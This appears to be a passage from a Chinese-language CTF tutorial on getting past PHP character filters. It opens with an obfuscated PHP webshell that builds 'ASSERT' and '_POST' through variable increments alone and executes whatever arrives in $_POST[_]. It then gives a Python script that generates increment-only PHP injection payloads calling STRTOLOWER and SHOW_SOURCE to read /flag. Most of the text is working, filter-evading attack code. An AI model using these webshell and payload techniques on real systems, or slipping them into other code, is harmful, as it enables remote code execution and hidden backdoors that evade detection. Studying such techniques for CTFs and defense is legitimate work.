$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

提高篇

过滤字母、数字和大部分字符

这次ban掉了绝大多数可利用字符，保留了或运算，但y1ng师傅写了一个万金油脚本就是利用了上述的自增法，方法更加的万金油。

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
from urllib.parse import quote_plus

def g(payload, buff):
    offset = 3 + buff
    res = ""
    base = 65
    for i in range(len(payload)):
        if payload[i] == '_' or payload[i] == '/':
            continue
        _ascii = ord(payload[i])
        #init
        underline =  "$" + ("_" * (i + offset))
        undefined = "$" + ("_" * (len(payload) + offset + 15))
        var = f"++{underline};$__-={underline};$__++;{underline}/=$__;{underline}=(({undefined}/{undefined}).{underline})"+r"{++$__};$__--;"
        res += var;
        tmp = ''
        if _ascii > base:
            for i in range(_ascii-base):
                tmp = tmp + f"++{underline};"
        res += tmp

    first =  "$" + ("_" * offset)
    for i in range(1, len(payload)):
        if payload[i] == '_':
            res += f"{first}.='_';"
            continue
        if payload[i] == '/':
            res += f"{first}.='/';"
            continue
        final_var = "$" + ("_" * (i + offset))
        res += f"{first}.={final_var};"
    return [res, "$" + "_" * (offset)]

pre = "'');"
after = '//'

buff = len('STRTOLOWERSHOW_SOURCE')
flag = g("/FLAG", buff)

buff = len('STRTOLOWER')
showsource = g("SHOW_SOURCE", buff)

buff = 0
strtolower = g('STRTOLOWER', buff)

final = ''

#1.构造STRTOLOWER并存进变量a
final += strtolower[0]
a = strtolower[1] # a = '$___' # STRTOLOWER

#2.构造SHOW_SOURCE并存进变量b
final += showsource[0]
b = showsource[1] # b = '$_____________' #SHOW_SOURCE

#3.构造/FLAG并存进变量c
final += flag[0] + flag[1] + "='/'." + flag[1] + ';'
c = flag[1] # c = '$________________________' #/FLAG

#声明好abc变量
padding = f'$______________________________________________={a};$_______________________________________________={b};$________________________________________________={c};'
final += padding

# 4.变量d = a(c) 则变量d为/flag
d = "$______________________________________________($________________________________________________);"
padding = '$_________________________________________________='+d
final += padding

#5. b(d) 即为SHOW_SOURCE('/flag')
final += '$_______________________________________________($_________________________________________________);'

final = pre + final
final = final + after

print(final.replace('+', '%2b'))

aaa